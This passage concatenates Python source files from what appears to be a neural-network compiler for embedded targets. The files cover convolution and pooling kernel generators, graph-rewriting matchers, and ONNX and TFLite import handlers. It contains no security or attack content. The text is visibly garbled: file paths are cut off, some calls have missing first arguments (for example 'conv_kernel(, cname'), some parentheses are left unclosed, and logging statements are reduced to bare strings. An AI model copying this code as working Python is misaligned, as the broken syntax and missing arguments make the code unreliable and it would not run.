act_params, at_ver=3, gen_ctrl=None, force_relu=True): if gen_ctrl is None: gen_ctrl = GenCtrl(None, cname=cname) else: gen_ctrl.cname = cname if act_params is not None: at_act_params = gen_activation_op(act_params.activation, force_relu=force_relu) else: at_act_params = NO_ACTIVATION padtop = pad_params.padding[0][0] padbot = pad_params.padding[0][1] padded_idx = 0 if matrixadd_params.in_dims[0].size() > matrixadd_params.in_dims[1].size() else 1 dimensions0 = make_three_dims(matrixadd_params.in_dims[0]) dimensions1 = make_three_dims(matrixadd_params.in_dims[1]) attrs = { 'feat': max(dimensions0[0], dimensions1[0]), 'width': dimensions0[1], 'height': dimensions0[2], 'padded_idx': padded_idx, 'padtop': padtop, 'padbot': padbot, 'act_oper': at_act_params } extra_attrs = { 'cname': cname, 'node_name': node_name } super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl) ``` #### File: new_generators/mult8/ ```python from graph.dim import PadDim from graph.types.pooling import PoolingParameters from quantization.multiplicative.scaling_qtypes import MultMulBiasScaleQType from generation.new_generators.helpers.act_infos import gen_act_infos from generation.helpers.gen_scales import gen_scales from generation.at_types.at_params import NO_POOL, gen_activation_op, gen_conv_at_params, gen_pool_at_params import logging from utils.node_id import NodeId import numpy as np from generation.at_types.constant_info import ConstantInfo from generation.at_types.gen_ctrl import GenCtrl from generation.at_types.tc_arg_info import GlobalArgInfo from generation.bindings import (CommentBindingList, GNodeArgEdge, GNodeArgNode, NodeBindingList) from generation.generators.globals.global_names import INFOS, MULSCALE, MULSHIFT from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel from generation.helpers.gen_constant import gen_constant from generation.new_generators.generator_base import (GeneratorBase, paramstype, ktype) from graph.types import Conv2DParameters, ConvFusionParameters from quantization.qtype import QType LOG = logging.getLogger("nntool." + __name__) def verify_scalar(arr): return [item.item() if isinstance(item, np.ndarray) else item for item in arr] @paramstype(Conv2DParameters, ConvFusionParameters) @ktype('scaled') class ConvActGenerator(GeneratorBase): @classmethod def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool: if isinstance(pnode, Conv2DParameters): gen_scales(gen, pnode, pnode, qrec) infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation" filt_q = qrec fnode = pnode elif isinstance(pnode, ConvFusionParameters) and isinstance(fnode, Conv2DParameters): cnodes = pnode.contained_nodes() quants = [gen.G.quantization[NodeId(pnode, fnode)] for fnode in cnodes] filt_q = quants[0] gen_scales(gen, pnode, cnodes[0], quants[0]) if pnode.fusion_type in ("conv_active_pool", "conv_active"): infos, infos_comment = gen_act_infos(cnodes[1], quants[1]) elif pnode.fusion_type == "conv_pool_active": infos, infos_comment = gen_act_infos(cnodes[2], quants[2]) elif pnode.fusion_type == "conv_pool": infos, infos_comment = np.array([0, 0, 0, 0, 0]), "no activation" else: return False infos = np.append(infos, [0, 0, 0, 0]) comment = str.format("BiasQ: {}", 0) + infos_comment infos[5] = 0 # BiasQ if filt_q.cache.get('ne16'): conv_mul_bias = filt_q.cache.get('mul_biases_q') prenorm = conv_mul_bias.pre_normalization if isinstance(conv_mul_bias, MultMulBiasScaleQType) else 0 pad_value = np.array(filt_q.in_qs[0].zero_point).astype(np.int16) pad_value1 = np.bitwise_and(pad_value, 0xFF) pad_value2 = np.bitwise_and(pad_value, 0xFF00) >> 8 w_offset = -np.array(filt_q.in_qs[1].zero_point).astype(np.int32) w_offset1 = np.bitwise_and(w_offset, 0xFF) w_offset2 = np.bitwise_and(w_offset, 0xFF00) >> 8 w_offset3 = np.bitwise_and(w_offset, 0xFF0000) >> 16 w_offset4 = np.bitwise_and(w_offset, 0xFF000000) >> 24 infos = np.append( infos, verify_scalar([prenorm if prenorm else 0, pad_value1, pad_value2, w_offset1, w_offset2, w_offset3, w_offset4])) cname, file_name = gen_constant(gen, pnode, fnode, INFOS) const_info = ConstantInfo(file_name, QType.Pow2(bits=8, q=0, signed=True), contents=infos) gen.globals.append(GlobalArgInfo("int8", cname, gen.opts['default_global_home_location'], gen.opts['default_global_exec_location'], const_info=const_info, comment=comment)) return True @classmethod def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool: step_idx = node.step_idx if isinstance(node, Conv2DParameters): set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, node, qrec) elif isinstance(node, ConvFusionParameters): cnodes = node.contained_nodes() quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes] if node.fusion_type in ("conv_active_pool", "conv_active", "conv_pool"): set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, cnodes[0], quants[0], out_q=quants[1]) elif node.fusion_type == "conv_pool_active": set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, cnodes[0], quants[0], out_q=quants[2]) else: return False else: return False return True @classmethod def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool: if isinstance(node, Conv2DParameters): conv_kernel = ConvPoolReluKernelNE16 if qrec.cache.get("ne16") else ConvPoolReluKernelSQ8 gen.kernels.append(conv_kernel(, cname, node, qrec, None, None, None, None, force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl())) elif isinstance(node, ConvFusionParameters): cnodes = node.contained_nodes() quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes] conv_kernel = ConvPoolReluKernelNE16 if quants[0].cache.get("ne16") else ConvPoolReluKernelSQ8 if node.fusion_type == "conv_active_pool": gen.kernels.append(conv_kernel(, cname, cnodes[0], quants[0], cnodes[2], quants[2], cnodes[1], quants[1], force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl())) elif node.fusion_type == "conv_pool_active": gen.kernels.append(conv_kernel(, cname, cnodes[0], quants[0], cnodes[1], quants[1], cnodes[2], quants[2], force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl())) elif node.fusion_type == "conv_active": gen.kernels.append(conv_kernel(, cname, cnodes[0], quants[0], None, None, cnodes[1], quants[1], force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl())) elif node.fusion_type == "conv_pool": gen.kernels.append(conv_kernel(, cname, cnodes[0], quants[0], cnodes[1], quants[1], None, None, force_relu=gen.force_relu, gen_ctrl=node.get_gen_ctrl())) else: return False return True def set_conv_bindings(gen, step_idx, in_eparams, out_eparams, cname, conv_params, conv_q, out_q=None): del step_idx if out_q is None: out_q = conv_q gen.bindings.append( CommentBindingList("Node {} inq {} weightsq {} outq {} biasesq {}", cname, conv_q.in_qs[0], conv_q.in_qs[1], out_q.out_qs[0], conv_q.in_qs[2]) ) gen.bindings.append( NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]), GNodeArgEdge(in_eparams[2]), GNodeArgEdge(out_eparams[0], "GNA_OUT"), GNodeArgNode(conv_params, MULSCALE), GNodeArgNode(conv_params, MULSHIFT), GNodeArgNode(conv_params, INFOS) )) class ConvPoolReluKernel(NewAutoTilerKernel): def __init__(self, node_name, cname, conv_params, conv_q, pool_params, pool_q, act_params, act_q, force_relu, gen_ctrl=None): if gen_ctrl is None: self.gen_ctrl = gen_ctrl = GenCtrl(None, cname=cname) else: gen_ctrl.cname = cname self.gen_ctrl = gen_ctrl is_ne16 = conv_q.cache.get('ne16') hwc = False if not is_ne16 and conv_params.ker_in_order and conv_params.ker_in_order[0] == ["h", "w", "c"]: hwc = True gen_ctrl.hwc = 1 if not is_ne16 and not hwc and conv_params.filter.h == 1 and conv_params.filter.w == 1 and gen_ctrl.enableim2col is None: gen_ctrl.enableim2col = 1 in_q = filter_q = out_q = bias_q = None in_dim = out_dim = None pad_compatibilities = [] at_conv_params = gen_conv_at_params( conv_params, pad_compatibilities) in_dim = conv_params.in_dims[0] out_dim = conv_params.out_dims[0] filter_q = conv_q.in_qs[1] in_q = conv_q.in_qs[0] out_q = conv_q.out_qs[0] bias_q = conv_q.in_qs[2] pad_val = in_q.zero_point[0] if pool_params is not None: at_pool_params = gen_pool_at_params( pool_params, pad_compatibilities) out_dim = pool_params.out_dims[0] out_q = pool_q.out_qs[0] else: at_pool_params = NO_POOL if act_params is not None: act_op = gen_activation_op( act_params.activation, force_relu=force_relu, asymmetric=act_q.in_qs[0].zero_point != 0) if out_dim is None: out_dim = act_params.out_dims[0].expand_to_chw() out_q = act_q.out_qs[0] else: act_op = "KOP_NONE" if pad_compatibilities: reduction = PadDim.pad_compatibility_reduce(*pad_compatibilities, "convolution padding is not compatible with pool padding") if not reduction[2]: # default is balanced pad left at_pad_ctrl = next(i for i, v in enumerate(reduction) if v) LOG.debug("%s: generating pad control block", node_name) self.gen_ctrl.PadType = at_pad_ctrl attrs = { 'in_size': in_q.dtype_bits//8 if in_q.signed else -in_q.dtype_bits//8, 'out_size': out_q.dtype_bits//8 if out_q.signed else -out_q.dtype_bits//8, 'bias_size': bias_q.dtype_bits//8, 'filter_bits': filter_q.bits, 'in_feat': in_dim.c, 'out_feat': out_dim.c, 'in_width': in_dim.w, 'in_height': in_dim.h, 'kop_conv': at_conv_params.ConvOper, 'fcx': at_conv_params.Fcx, 'fcy': at_conv_params.Fcy, 'dcx': at_conv_params.Dcx, 'dcy': at_conv_params.Dcy, 'scx': at_conv_params.Scx, 'scy': at_conv_params.Scy, 'conv_pad': at_conv_params.ConvPad, 'pad_value': pad_val, 'kop_pool': at_pool_params.PoolOper, 'fpx': at_pool_params.Fpx, 'fpy': at_pool_params.Fpy, 'dpx': at_pool_params.Dpx, 'dpy': at_pool_params.Dpy, 'spx': at_pool_params.Spx, 'spy': at_pool_params.Spy, 'pool_pad': at_pool_params.PoolPad, 'kop_act': act_op } extra_attrs = { 'cname': cname, 'node_name': node_name } super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl) class ConvPoolReluKernelNE16(ConvPoolReluKernel): CALL_TEMPLATE = """// generator for {node_name} CNN_ConvolutionNE16("{cname}", {gen_ctrl}, {in_size}, {out_size}, {bias_size}, 1, {filter_bits}, {in_feat}, {out_feat}, {in_width}, {in_height}, {kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad}, {pad_value}, {kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad}, {kop_act}); """ class ConvPoolReluKernelSQ8(ConvPoolReluKernel): CALL_TEMPLATE = """// generator for {node_name} CNN_ConvolutionPoolAct_SQ8("{cname}", {gen_ctrl}, {bias_size}, 1, {in_feat}, {out_feat}, {in_width}, {in_height}, {kop_conv}, {fcx}, {fcy}, {dcx}, {dcy}, {scx}, {scy}, {conv_pad}, {kop_pool}, {fpx}, {fpy}, {dpx}, {dpy}, {spx}, {spy}, {pool_pad}, {kop_act}); """ ``` #### File: manipulations/adjusts/ ```python import logging from graph.types import (ActivationFusion, AveragePoolParameters, MaxPoolParameters, PoolingParameters) from ..adjust_base import AdjusterBase, handles LOG = logging.getLogger("nntool." + __name__) @handles(MaxPoolParameters, AveragePoolParameters) class PoolAdjuster(AdjusterBase): def adjust(self, G, node): modified = False # check that the transposed input 0 matches autotiler order names = node.in_dims[0].order if names != node.ker_in_order[0]: self.adjust_in_out_order(G, node, names, node.ker_in_order[0]) modified = True return modified @handles(ActivationFusion) class PoolFusionAdjuster(AdjusterBase): def adjust(self, G, node): modified = False fusion_node = node pool_node = next(iter([node for node in fusion_node.contained_nodes() if isinstance(node, PoolingParameters)]), None) if pool_node is None: return modified # check that the transposed input 0 matches autotiler order names = pool_node.in_dims[0].order if names != pool_node.ker_in_order[0]: self.adjust_in_out_order(G, pool_node, names, pool_node.ker_in_order[0], fusion=fusion_node) modified = True return modified ``` #### File: matches/matchers/ ```python import logging from graph.dim import Dim from graph.types import (ConcatParameters, CopyParameters, InputParameters, NNEdge, ReshapeParameters, Parameters) from utils.graph import GraphView, Node from utils.node_id import NodeId from ..matcher import (Matcher, description, groups, match_name, modifies_dimensions, needs_valid_dimension, run_before) LOG = logging.getLogger("nntool." + __name__) class DummyInput(Parameters): def __init__(self, name: str, edge): super().__init__(name) self.edge = edge def traverse_to_concat(G, edge, subgraph, edge_path=None): if edge_path is None: edge_path = [] node = edge.from_node if isinstance(node, ConcatParameters): if node.axis != 0 or len(G.out_edges(node)) > 1: return [] find_concats_up(G, node, subgraph) return edge_path + [edge] elif isinstance(node, (CopyParameters, ReshapeParameters)): if len(G.out_edges(node)) > 1: return [] in_edge = G.in_edges(node)[0] return traverse_to_concat(G, in_edge, subgraph, edge_path=edge_path + [edge]) else: return [] def find_concats_up(G, concat, subgraph: GraphView = None): # Produces a subgraph of concats operating on axis 0 separated by copys or reshapes. # the output node will be the final concat. the input nodes will be all the inputs # to a condensed concat that can replace this subgraph. if subgraph is None: subgraph = GraphView() edge_path = [] for edge in G.indexed_in_edges( edge_path = traverse_to_concat(G, edge, subgraph) if edge_path: for inter_edge in edge_path: subgraph.add_edge(inter_edge) else: subgraph.add_edge( NNEdge( from_node=DummyInput(f"{}_{edge.from_idx}", edge), to_node=edge.to_node, to_idx=edge.to_idx ) ) return subgraph # def find_concats_up(G, node, subgraph: GraphView = None, edge_path=None): # # Produces a subgraph of concats operating on axis 0 separated by copys or reshapes. # # the output node will be the final concat. the input nodes will be all the inputs # # to a condensed concat that can replace this subgraph. # if subgraph is None: # subgraph = GraphView() # edge_path = [] # for edge in G.indexed_in_edges( # if isinstance(edge.from_node, ConcatParameters): # if len(G.out_edges( > 1 or edge.from_node.axis != 0: # continue # edge_path.append(edge) # for traversed_edge in edge_path: # subgraph.add_edge(traversed_edge.clone()) # find_concats_up(G, edge.from_node, subgraph=subgraph, edge_path=[]) # elif isinstance(edge.from_node, (CopyParameters, ReshapeParameters)): # if len(G.out_edges( > 1: # continue # find_concats_up(G, edge.from_node, subgraph=subgraph, # edge_path=edge_path + [edge]) # return subgraph def remove_internal_graph(G, subgraph): in_nodes = subgraph.inputs() concat_node = subgraph.outputs()[0] for in_node in in_nodes: if G.edge_in_graph(in_node.edge): G.remove_edge(in_node.edge) nodes = {in_node.edge.to_node} while nodes: node = nodes.pop() if node == concat_node: continue nodes |= set(edge.to_node for edge in subgraph.out_edges(node)) if node in G: G.remove(node) nid = NodeId(node) if G.quantization and nid in G.quantization: del G.quantization[nid] @ match_name("combine_concats") @ description("Combine concats on 0 axis together") @ run_before('insert_copies') @ groups('*') @ needs_valid_dimension(True) @ modifies_dimensions(True) class CombineConcats(Matcher): def _match(self, G: GraphView, set_identity: bool = True, **kwargs): modified_graph = False concats = set(G.nodes(node_classes=ConcatParameters)) while concats: concat = concats.pop() if concat.axis != 0: continue subgraph = find_concats_up(G, concat) found = set(subgraph.nodes(node_classes=ConcatParameters)) if len(found) <= 1: continue f"Combining concats {','.join([ for node in found])}") modified_graph = True concats -= found in_edges = [inp.edge for inp in subgraph.inputs()] in_dims = [ edge.from_node.out_dims[edge.from_idx] for edge in in_edges ] nodes_to_remove = [node for node in subgraph.nodes() if node != concat and not isinstance(node, DummyInput)] for edge in in_edges: G.remove_edge(edge) for node in nodes_to_remove: if in G: G.remove(node) nid = NodeId(node) if G.quantization and nid in G.quantization: del G.quantization[nid] # remove_internal_graph(G, subgraph) out_dim = concat.out_dims[0] in_qs = [] for idx, edge in enumerate(in_edges): from_node = edge.from_node from_idx = edge.from_idx if len(in_dims[idx]) > 1: reshape = ReshapeParameters( G.unique_name(f'{}_flat{idx}'), old_shape=in_dims[idx], shape=Dim.unnamed([in_dims[idx].size()])) G.add_edge( NNEdge( from_node=from_node, from_idx=from_idx, to_node=reshape)) from_node = reshape from_idx = 0 G.add_edge( NNEdge( from_node=from_node, from_idx=from_idx, to_node=concat, to_idx=idx)) if in_qs is not None and G.quantization: nid = NodeId(edge.from_node) if nid in G.quantization: qrec = G.quantization[nid] in_qs.append(qrec.out_qs[edge.from_idx]) else: in_qs = None else: in_qs = None if in_qs is not None and G.quantization: nid = NodeId(concat) if nid in G.quantization: G.quantization[nid].in_qs = in_qs reshape = ReshapeParameters( G.unique_name(f'{}_expand'), old_shape=Dim.unnamed([out_dim.size()]), shape=out_dim) G.insert_node_after(concat, reshape, edge_class=NNEdge) if set_identity: self.set_identity(G) return modified_graph ``` #### File: matches/matchers/ ```python import logging from graph.dim import Dim from graph.types import ConstantInputParameters, NNEdge from utils.graph import GraphView from ..matcher import Matcher, match_name, description, run_before, groups LOG = logging.getLogger("nntool." + __name__) @match_name("match_duplicate_constants") @description("""Find constants that are linked to more than one node and duplicate them""") @run_before('*') @groups('symmetric', 'scaled') class MatchDuplicateConstants(Matcher): def _match(self, G: GraphView, set_identity: bool = True, **kwargs): has_modified = False for node in G.nodes(node_classes=ConstantInputParameters): out_edges = G.out_edges( if len(out_edges) <= 1: continue has_modified = True'node %s has more than one out edge and will be duplicated', idx = 1 for out_edge in out_edges[1::]: new_constant = ConstantInputParameters( f'{}_{idx}', dims=Dim.unnamed(node.dims.shape), value=node.value.copy()) G.remove_edge(out_edge) G.add_edge(NNEdge(from_node=new_constant, to_node=out_edge.to_node, to_idx=out_edge.to_idx)) idx += 1 if set_identity: self.set_identity(G) return has_modified ``` #### File: matches/matchers/ ```python import logging from graph.types import NNEdge from graph.types.others import ReshapeParameters, StridedSliceParameters from utils.graph import GraphView from utils.node_id import NodeId from ..matcher import Matcher, match_name, description, run_before, groups LOG = logging.getLogger("nntool." + __name__) @match_name("remove_slice") @description("Removes slices that are doing nothing and may insert a reshape if necessary.") @run_before('*') @groups('symmetric', 'scaled') class RemoveSlice(Matcher): def _match(self, G: GraphView, set_identity: bool = True, **kwargs) -> bool: has_modified_graph = False for node in [node for node in G.nodes(node_classes=StridedSliceParameters)]: if node.slice_shape != tuple(node.in_dims[0].shape): continue has_modified_graph = True nid = NodeId(node) if node.slice_shape == node.out_shape:'removing strided slice {} that does nothing') G.remove_and_reconnect(node, edge_class=NNEdge) if G.quantization and nid in G.quantization: del G.quantization[nid] else: reshape = ReshapeParameters(G.unique_name(f'{}_reshape'), old_shape=node.slice_shape, shape=node.out_shape)'replacing strided slice {} with reshape {}') G.replace_node(node, reshape) if G.quantization and nid in G.quantization: G.quantization[NodeId(reshape)] = G.quantization[nid] del G.quantization[nid] if set_identity: self.set_identity(G) return has_modified_graph ``` #### File: graph/matches/ ```python import logging from graph.matches.matcher import Matcher, MatchGroup from utils.subclasses import get_all_subclasses from .matchers import * LOG = logging.getLogger("nntool." + __name__) def general_validation(match: Matcher): if match.DESCRIPTION is None: LOG.warning('matcher %s has no description', match.NAME) if match.NAME is None: raise ValueError(f'match {match.NAME} has no name') if '*' in match.RUN_BEFORE and '*' in match.RUN_AFTER: raise ValueError( f'match {match.NAME} has wildcard in run_before and run_after') return match ALL_MATCHERS = [general_validation(match_class) for match_class in get_all_subclasses(Matcher) if match_class.NAME is not None] def select_matchers(group=None): return [match_class for match_class in ALL_MATCHERS if (group is None or '*' in match_class.GROUPS or group in match_class.GROUPS)] def order_matchers(matchers): first_matchers = [match for match in matchers if '*' in match.RUN_BEFORE] last_matchers = [match for match in matchers if '*' in match.RUN_AFTER] rest = [match for match in matchers if match not in first_matchers + last_matchers] rest_sorted = [] while rest: matcher = rest.pop(0) pos = 0 for omatch in rest_sorted: if matcher.NAME in omatch.RUN_AFTER: break if omatch.NAME in matcher.RUN_BEFORE: break pos += 1 rest_sorted.insert(pos, matcher) return first_matchers + rest_sorted + last_matchers def select_sorted_matchers(group=None): return order_matchers(select_matchers(group=group)) def select_sorted_matcher_instances(group=None): return [matcher() for matcher in select_sorted_matchers(group=group)] def get_fusions(): return sorted( [(match_class.NAME, match_class.DESCRIPTION) for match_class in ALL_MATCHERS], key=lambda x: x[0]) def get_pow2_match_group(): return MatchGroup( *select_sorted_matcher_instances(group='symmetric'), identity="pow2_match_group" ) def get_scale8_match_group(): return MatchGroup( *select_sorted_matcher_instances(group='scaled'), identity="std_match_group" ) def get_fusion(name): if name in ["pow2_match_group"]: return get_pow2_match_group() if name in ["std_match_group", "scale8_match_group"]: return get_scale8_match_group() match_class = next((match_class for match_class in select_matchers() if match_class.NAME == name), None) if match_class is not None: return match_class() return None ``` #### File: graph/types/ ```python def summarize_stats(stats): summary = {'mean': 0, 'std': 0, 'amin': float("Infinity"),\ 'amax':float('-Infinity'), 'lmin': float("-Infinity"),\ 'lmax':float('Infinity'), 'min': 0, 'max': 0,\ 'range': float("-Infinity")} for v in stats: for k in ['mean', 'std', 'min', 'max']: summary[k] += v[k] summary['amin'] = min(summary['amin'], v['min']) summary['amax'] = max(summary['amax'], v['max']) summary['lmin'] = max(summary['lmin'], v['min']) summary['lmax'] = min(summary['lmax'], v['max']) summary['range'] = max(summary['range'], v['range']) for k in ['mean', 'std', 'min', 'max']: summary[k] /= len(stats) for v in stats: v['precision'] = v['range']/summary['range'] return summary ``` #### File: importer/common/ ```python class HandlerOptions(): HANDLER_OPTIONS = [] @staticmethod def handler_option(name, val_type=str, default="", desc="description missing", shortcut=None): def deco(cls): # check if this class actually defines HANDLER_OPTIONS if 'HANDLER_OPTIONS' not in cls.__dict__: value = [] setattr(cls, 'HANDLER_OPTIONS', value) else: value = getattr(cls, 'HANDLER_OPTIONS') value.append({'name': name, 'val_type': val_type, 'default': default, 'desc': desc, 'shortcut': shortcut}) return cls return deco @classmethod def get_all_handler_options(cls): options = {} for subclass in cls.__subclasses__(): for option in getattr(subclass, 'HANDLER_OPTIONS'): options[option['name']] = option return options @classmethod def get_default_handler_options(cls): options = {} for subclass in cls.__subclasses__(): for option in getattr(subclass, 'HANDLER_OPTIONS'): options[option['name']] = option['default'] return options #pylint: disable=invalid-name handler_option = HandlerOptions.handler_option ``` #### File: handlers/backend/ ```python import numpy as np from importer.common.constant_mixin import ConstantMixin from quantization.qtype import QType from ..backend_handler import BackendHandler from ..handler import onnx_op @onnx_op("DequantizeLinear") class DequantizeLinear(ConstantMixin, BackendHandler): @classmethod def _common(cls, node, **kwargs): all_nodes = kwargs['all_nodes'] inputs = [all_nodes[inp] for inp in node.input] axis = node.attrs.get('axis', None) x = inputs[0] scale = inputs[1] zero_point = inputs[2] if len(inputs) > 2 else None qtype = QType( dtype=zero_point[0].value.dtype, scale=scale[0].value, zero_point=zero_point[0].value, quantized_dimension=axis) all_nodes[node.input[0]] = tuple(list(x)[0:3] + [qtype]) all_nodes[node.output[0]] = tuple(list(x)[0:3] + [None]) return x[0] @classmethod def version_10(cls, node, **kwargs): return cls._common(node, **kwargs) @classmethod def version_13(cls, node, **kwargs): return cls._common(node, **kwargs) ``` #### File: handlers/backend/ ```python import numpy as np from graph.types import ConstantInputParameters, NNEdge from graph.types.others import NoOPParameters, PadParameters from importer.common.constant_mixin import ConstantMixin from importer.common.provisional_dim import ProvisionalDim from importer.onnx.common import logger from ..backend_handler import BackendHandler from ..handler import onnx_op, partial_support, ps_description @onnx_op("Pad") @partial_support(True) @ps_description("Only constant pad amounts are supported." "Only 2D padding is supported. Padding must be successfully fused into a " "convolution or pooling operation to generate successfully. There is currently " "no AutoTiler Pad generator.") class Pad(ConstantMixin, BackendHandler): @classmethod def _common(cls, node, mode='constant', pads=None, constant_value=0, **kwargs): all_nodes = kwargs['all_nodes'] G = kwargs['G'] valid_name = kwargs['valid_name'] inputs = [all_nodes[inp] for inp in node.input] x = inputs[0] x_shape = x[2].shape ndim = len(x_shape) npad = len(pads)//2 if npad != ndim: if all(not pad for pad in pads): logger.warning(f'Pad {valid_name} has {npad} pad values and {ndim} input rank. ' 'Since pad is zero this is ignored but it probably indicates a bug in the ONNX graph.') else: raise ValueError( f'Eroor in ONNX graph - pad {valid_name} has {npad} pad values and {ndim} input rank.') apads = np.array([[pads[idx], pads[idx+ndim]] for idx in range(ndim)]) # apads = np.array(pads).reshape((-1, 2)) if cls.is_constant(x):"reducing %s to a constant", valid_name) val = cls.get_constant(x) if mode == 'constant': val = np.pad(val, apads, mode=mode, constant_values=constant_value) else: val = np.pad(val, apads, mode=mode) params = ConstantInputParameters(valid_name, value=val) pshape = [ dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)] all_nodes[node.output[0]] = ( params, 0, ProvisionalDim(pshape), x[3]) return params if mode != 'constant': raise ValueError('%s - pad mode %s is not supported' % (valid_name, mode)) if any(sum(pad) > 0 and x_shape[idx] is None for idx, pad in enumerate(apads)): raise ValueError( f'unknown/batch axis is being padded in {valid_name}. Manipulation of ' 'unknown/batch axis is not supported') trimmed_pads = tuple( [pad for idx, pad in enumerate(apads) if x_shape[idx] is not None]) if all(sum(trimmed_pad) == 0 for trimmed_pad in trimmed_pads): params = NoOPParameters(valid_name, desc="eliminated pad of 0") pshape = x_shape else: pshape = [ dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)] # pshape = [None if dim is None else dim + sum(apads[idx]) for idx, dim in enumerate(x_shape)] padvals = [(constant_value, constant_value)] * len(trimmed_pads) params = PadParameters( valid_name, padding=trimmed_pads, pad_vals=padvals) G.add_edge( NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0)) all_nodes[node.output[0]] = (params, 0, ProvisionalDim(pshape), x[3]) return params @classmethod def _args_version(cls, node, padkey='pads', **kwargs): mode = node.attrs.get('mode', 'constant') pads = node.attrs.get(padkey) value = node.attrs.get('value') return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs) @classmethod def _inputs_version(cls, node, **kwargs): mode = node.attrs.get('mode', 'constant') if len(node.input) > 1 and node.input[1]: y = kwargs['all_nodes'][node.input[1]] pads = tuple(cls.get_constant(y)) if len(node.input) > 2 and node.input[2]: z = kwargs['all_nodes'][node.input[2]] value = cls.get_constant(z) else: value = 0 else: raise ValueError('no pads input for node %s' % kwargs['valid_name']) return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs) @classmethod def version_1(cls, node, **kwargs): return cls._args_version(node, padkey='paddings', **kwargs) @classmethod def version_2(cls, node, **kwargs): return cls._args_version(node, padkey='pads', **kwargs) @classmethod def version_11(cls, node, **kwargs): return cls._inputs_version(node, **kwargs) @classmethod def version_13(cls, node, **kwargs): return cls._inputs_version(node, **kwargs) ``` #### File: tflite2/common/ ```python from typing import Iterator, List from importer.tflite2.common.tflite_node import TFLiteNode from importer.tflite2.common.tflite_tensor import TFLiteTensorWrapper from ..tflite_schema_head.Model import Model from ..tflite_schema_head.SubGraph import SubGraph from ..tflite_schema_head.Tensor import Tensor class TFliteIterator(): def __init__(self, obj, len_prop, elem_prop) -> None: self._obj = obj self._len_prop = len_prop self._elem_prop = elem_prop self._idx = 0 def __len__(self): return getattr(self._obj, self._len_prop)(self._obj) def __next__(self): if self._idx >= len(self): raise StopIteration() elem = getattr(self._obj, self._elem_prop)(self._obj, self._idx) self._idx += 1 return elem def __iter__(self): self._idx = 0 return self def __getitem__(self, idx): return getattr(self._obj, self._elem_prop)(self._obj, idx) class TFLiteGraph(): def __init__(self, model: Model, subgraph: SubGraph, subgraph_idx: int, name_cache=None, anonymise=False) -> None: self._model = model self._subgraph = subgraph self._subgraph_idx = subgraph_idx self._tensors = [TFLiteTensorWrapper(self._subgraph.Tensors( idx), self._model) for idx in range(self._subgraph.TensorsLength())] self._nodes = [TFLiteNode(self._subgraph.Operators(idx), idx, self._model, self, name_cache=name_cache, anonymise=anonymise) for idx in range(self._subgraph.OperatorsLength())] @classmethod def from_model(cls, model: Model, subgraph_idx: int, name_cache=None, anonymise=False): return cls(model, model.Subgraphs(subgraph_idx), subgraph_idx, name_cache=name_cache, anonymise=anonymise) @property def model_version(self) -> int: return self._model.Version() @property def tensors(self) -> Iterator[Tensor]: return self._tensors @property def input(self) -> List[TFLiteTensorWrapper]: return [self.tensors[idx] for idx in self._subgraph.InputsAsNumpy()] @property def output(self) -> List[TFLiteTensorWrapper]: return [self.tensors[idx] for idx in self._subgraph.OutputsAsNumpy()] @property def nodes(self) -> List[TFLiteNode]: return self._nodes @property def idx(self): return self._subgraph_idx ``` #### File: handlers/backend/ ```python from graph.dim import PadDim from importer.tflite2.tflite_schema_head.Padding import Padding class FilterPadMixin(object): @classmethod def get_tf_padding(cls, padding): if padding == Padding.SAME: return PadDim.same() if padding == Padding.VALID: return PadDim.valid() raise ValueError("Strange padding type") ``` #### File: handlers/backend/ ```python from graph.dim import Conv2DFilterDim, PadDim, StrideDim from graph.types import NNEdge, TransposeConv2DParameters from importer.common.constant_mixin import ConstantMixin from importer.common.provisional_dim import ProvisionalDim from importer.tflite2.common.tflite_node import TFLiteNode from importer.tflite2.tflite_schema_head.Padding import Padding from importer.tflite2.tflite_schema_head.TransposeConvOptions import \ TransposeConvOptions from ..backend_handler import BackendHandler from ..handler import tflite_op, partial_support, ps_description from .filter_mixin import FilterMixin @tflite_op("TRANSPOSE_CONV") @partial_support(True) @ps_description('Transpose Conv is only imported. No kernels are implemented for it. We suggest' 'using a resizer followed by a normal convolution.') class TransposeConv(ConstantMixin, FilterMixin, BackendHandler): @classmethod def version_1(cls, node: TFLiteNode, **kwargs): node_opts = node.get_options(TransposeConvOptions) G = kwargs['G'] opts = kwargs['opts'] all_nodes = kwargs['all_nodes'] inputs = [all_nodes[t] for t in node.input] x = inputs[2] x_shape = x[2].shape in_b, in_h, in_w, in_c = tuple(x_shape) pout_shape = [dim if x_shape[idx] is not None else None for idx, dim in enumerate(cls.get_constant(inputs[0]))] out_b, out_h, out_w, out_c = tuple(pout_shape) filt = inputs[1] weights_node = filt[0] filt_shape = filt[2].shape # # ['in_c', 'h', 'w', 'out_c'] filt_out_c, filt_h, filt_w, filt_in_c = tuple(filt_shape) filt_dim = Conv2DFilterDim(filt_h, filt_w, filt_out_c, in_c=filt_in_c) filt_dim = filt_dim.impose_order(cls.TF_LITE_FILTER_ORDER) stride_w = node_opts.StrideW() stride_h = node_opts.StrideH() # compute padding pad = node_opts.Padding() if pad == Padding.SAME: pad_h = ((in_h - 1) * stride_h + filt_h - out_h) pad_w = 